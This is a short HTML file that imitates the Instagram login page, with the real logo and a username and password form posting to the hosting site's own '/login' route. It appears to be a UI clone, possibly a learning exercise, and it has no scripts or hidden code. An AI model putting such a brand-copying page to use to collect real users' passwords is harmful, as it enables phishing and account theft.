<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Instagram Login</title>
  <link rel="stylesheet" href="/stylesheets/login.css">
</head>
<body>
  <div class="login-container">
    <div class="login-box">
      <img src="https://upload.wikimedia.org/wikipedia/commons/9/95/Instagram_logo_2022.svg" alt="Instagram logo" class="logo">
      <form class="login-form" action="/login" method="post">
        <input type="text" placeholder="username" name="username" required>
        <input type="password" placeholder="Password" name="password" required>
         <button class="fb-login-btn" type="submit">Log In</button>
      </form>
      <div class="divider">OR</div>
      <button class="fb-login-btn">Log in with Facebook</button>
      <div class="forgot-password">
        <a href="#">Forgot password?</a>
      </div>
    </div>
  </div>
</body>
</html>
